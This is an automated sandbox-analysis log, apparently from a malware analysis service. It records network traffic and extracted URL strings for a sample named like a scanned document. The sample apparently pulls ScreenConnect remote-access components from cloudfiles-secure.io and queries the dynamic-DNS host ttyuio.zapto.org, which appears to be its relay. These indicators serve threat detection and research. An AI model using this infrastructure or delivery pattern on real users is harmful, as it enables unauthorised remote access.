Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloudfiles-secure.ioAccept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: cloudfiles-secure.io
Source: global traffic	DNS traffic detected: DNS query: ttyuio.zapto.org

Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD4.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807DC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cloudfiles-secure.io
Source: svchost.exe, 00000005.00000002.2961471636.0000013D8E211000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.
Source: Scan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.c
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: dfsvc.exe, 00000001.00000002.2639936321.00000261F99A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.c
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enQ
Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E458000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E458000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E458000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1724316618.0000013D8E48D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000001.00000002.2640132774.00000261F99BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000001.00000002.2641108291.00000261F9A91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: dfsvc.exe, 00000001.00000002.2641485344.00000261F9B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: svchost.exe, 00000005.00000002.2960166987.0000013D88EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2961877052.0000000002016000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Scan_doc_09_16_24_1203.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180354000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261804C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: dfsvc.exe, 00000001.00000002.2636308284.00000261F8E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Big
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Cli
Source: Scan_doc_09_16_24_1203.exe, 00000000.00000002.1950326930.00000000011EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.appli
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2639140020.00000261F9938000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261803F5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261804A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1964767967.0000000000594000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966344206.000000001ABE0000.00000004.00000020.00020000.00000000.sdmp, 5VTPZWXQ.log.1.dr	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic
Source: dfsvc.exe, 00000001.00000002.2641007006.00000261F9A75000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966264306.000000001ABC7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1965310592.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1964806905.00000000005E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application561934e089
Source: 5VTPZWXQ.log.1.dr	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationA
Source: dfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationEB
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.00000000022EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationX
Source: dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationestn32
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationlture=neutraQ
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966450277.000000001AC1D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationps_
Source: dfsvc.exe, 00000001.00000002.2640737589.00000261F9A04000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationsa
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dll
Source: dfsvc.exe, 00000001.00000002.2639936321.00000261F99A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dllJ
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1965529685.0000000002397000.00000004.00000800.00020000.00000000.sdmp, 5VTPZWXQ.log.1.dr	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServi
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllZ
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe0
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exeo
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.00000261801E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dlll7
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Win
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000001.00000002.2641523029.00000261F9B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dlll6
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.e
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261805C5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2619140064.000002618057C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261806F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClie
Source: dfsvc.exe, 00000001.00000002.2619140064.0000026180622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.e
Source: dfsvc.exe, 00000001.00000002.2619140064.00000261807E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000001.00000002.2619140064.000002618067B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000001.00000002.2638143104.00000261F9404000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exed
